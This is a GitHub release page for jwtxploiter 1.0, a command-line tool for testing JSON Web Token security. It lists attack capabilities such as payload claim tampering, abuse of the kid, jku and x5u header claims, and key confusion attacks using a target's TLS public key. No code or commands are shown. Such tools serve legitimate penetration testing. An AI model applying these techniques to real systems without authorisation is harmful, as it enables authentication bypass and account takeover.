Skip to content

jwtxploiter-1.0
Compare
Choose a tag to compare
@DontPanicO DontPanicO released this 30 Jan 16:25
v1.0
909eab7

A command line interface to test security of JSON Web Tokens.
Test JWTs against all known CVEs and more:

  • Tamper with the token payload: changes claims and subclaims values.
  • Exploit known vulnerable header claims (kid, jku, x5u)
  • Verify a token
  • Retrieve the public key of your target's ssl connection and try to use it in a key confusion attack with one option only
  • All JWAs supported
  • Generates a JWK and insert it in the token header
  • And much, much more!

Software is distributed via rpm package or a simple tarball. A debian package will be provided soon. This repository provides a detailed wiki, to be used as documentation, until a man for linux distributions will be released: https://github.com/DontPanicO/jwtXploiter/wiki

Assets 5
Loading